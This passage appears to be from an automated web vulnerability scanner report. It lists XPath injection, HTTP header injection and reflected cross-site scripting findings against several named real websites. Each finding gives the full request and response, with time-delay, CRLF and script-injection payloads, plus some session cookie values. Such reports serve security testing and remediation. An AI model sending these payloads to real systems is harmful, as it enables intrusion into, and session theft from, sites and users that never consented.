Path:   /practiceareas/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /practiceareas'/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:58:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...
2.30. http://www.hoganlovells.com/ru/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /ru/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /ru',0,0,0)waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6618
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Verdana
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='ru',0,0,0)waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.31. http://www.hoganlovells.com/splash/alumni/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /splash/alumni/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /splash'waitfor%20delay'0%3a0%3a20'--/alumni/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:14 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6638
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.</title>
<style>
body {font-family:"Ver
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash'waitfor%20delay'0:0:20'--/alumni']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
2.32. http://www.hoganlovells.com/splash/alumni/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /splash/alumni/

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /splash/alumni'waitfor%20delay'0%3a0%3a20'--/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 17 Apr 2011 16:59:32 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6638
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/

<html>
<head>
<title>'//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.</title>
<style>
body {font-family:"Ver
...[SNIP]...
</b>System.Xml.XPath.XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.<br>
...[SNIP]...
<pre>

[XPathException: '//Site[@NavID='1039']//Page[@VirtualPath='splash/alumni'waitfor%20delay'0:0:20'--']' has an invalid token.]
MS.Internal.Xml.XPath.XPathParser.CheckToken(LexKind t) +5052741
MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +5067400
MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput) +1
...[SNIP]...
3. HTTP header injection  previous  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9e34b%0d%0a9d55c7da001 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9e34b%0d%0a9d55c7da001;src=1904248;type=leads399;cat=searc191;ord=9131436890456.826? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.martindale.com/all/c-england/all-lawyers-2.htm?c=N
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9e34b
9d55c7da001;src=1904248;type=leads399;cat=searc191;ord=9131436890456.826:
Date: Sat, 16 Apr 2011 13:47:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
3.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 29793%0d%0a6b9998c57bd was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=29793%0d%0a6b9998c57bd&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=2882&BWDate=40640.944213&debuglevel=&FLV=29793
6b9998c57bd&RES=128&WMPV=0; expires=Fri, 15-Jul-2011 10: 03:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:33 GMT
Connection: close
Content-Length: 0

3.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 81b10%0d%0a85657bf67be was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=10.2154&wmpv=0&res=81b10%0d%0a85657bf67be HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=FLV=10.2154&RES=81b10
85657bf67be&WMPV=0; expires=Fri, 15-Jul-2011 10: 03:35 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:34 GMT
Connection: close
Content-Length: 0

3.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload e1587%0d%0a37fed39d5c was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=2190691~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.9050657076295465&flv=10.2154&wmpv=e1587%0d%0a37fed39d5c&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.reed-elsevier.com/Pages/Home.aspx
Origin: http://www.reed-elsevier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=e1587
37fed39d5c; expires=Fri, 15-Jul-2011 10: 03:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 16 Apr 2011 14:03:34 GMT
Connection: close
Content-Length: 0

3.5. https://cc.dealer.com/views/login [reseller parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/login

Issue detail

The value of the reseller request parameter is copied into the Location response header. The payload 6bacb%0d%0a504c4ba8636 was submitted in the reseller parameter. This caused a response containing an injected HTTP header.

Request

GET /views/login?sessionTimedOut=true&action=Login&lang=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&password=3&reseller=6bacb%0d%0a504c4ba8636&storeCookie=storeCookie HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.59.10.1303002182

Response

HTTP/1.1 302 Moved Temporarily
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Location: http://cc.dealer.com/views/login?loginFailed=true&reseller=6bacb
504c4ba8636&lang=http: //example.com/?
ns: netsparker056650=vuln
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Sun, 17 Apr 2011 01:59:03 GMT
Connection: keep-alive
Set-Cookie: ssoid=612ebd1c404638d30061b29f0f23881f;path=/;domain=.dealer.com
Set-Cookie: ssoid=612ebd1c404638d30061b29f0f23881f;path=/;domain=.dealer.com;expires=Thu, 01 Jan 1970 00:00:00 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT

4. Cross-site scripting (reflected)  previous  next
There are 327 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

4.1. http://ad.aggregateknowledge.com/iframe!t=624! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=624!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff22e"><script>alert(1)</script>ac12818f45c was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=624!?che=3157054&clk1=ff22e"><script>alert(1)</script>ac12818f45c HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.kirtsy.com/login.php?return=/submit.php?fc309%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ef2948ed7988=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=804427654888569294; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 15-Apr-2016 14:22:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJaoN4AAAAAAAEAhgEAmQECiAEQAAEAhn46STejmrz8%2FgAAAAAAAAHTAAAAAAAAAogAAAAAAAAAmQAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 16-Apr-2013 14:22:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:22:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="ff22e"><script>alert(1)</script>ac12818f45chttp://ad.aggregateknowledge.com/interaction!che=1936566067?imid=4199949303314971902&ipid=467&caid=134&cgid=153&crid=648&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sa
...[SNIP]...
4.2. http://ad.aggregateknowledge.com/iframe!t=624! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=624!

Issue detail

The value of the clk1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0834"%3balert(1)//2eb8545037b was submitted in the clk1 parameter. This input was echoed as a0834";alert(1)//2eb8545037b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=624!?che=3157054&clk1=a0834"%3balert(1)//2eb8545037b HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.kirtsy.com/login.php?return=/submit.php?fc309%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ef2948ed7988=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=933114531302223782; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 15-Apr-2016 14:22:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJaoN4AAAAAAAEAhgEAmQECgwEQAAEAhn4dJA%2F%2FFdHHhAAAAAAAAAHTAAAAAAAAAoMAAAAAAAAAmQAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 16-Apr-2013 14:22:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:22:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"a0834";alert(1)//2eb8545037bhttp://ad.aggregateknowledge.com/interaction!che=1154063332?imid=2099820914518640516&ipid=467&caid=134&cgid=153&crid=643&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sa
...[SNIP]...
4.3. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dff2d"-alert(1)-"c09d0074cf was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=dff2d"-alert(1)-"c09d0074cf HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6978
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 17 Apr 2011 15:01:46 GMT
Expires: Sun, 17 Apr 2011 15:01:46 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
QozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=dff2d"-alert(1)-"c09d0074cfhttp://turbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...
4.4. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd9ac"-alert(1)-"804dc1ac7d6 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQcd9ac"-alert(1)-"804dc1ac7d6&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
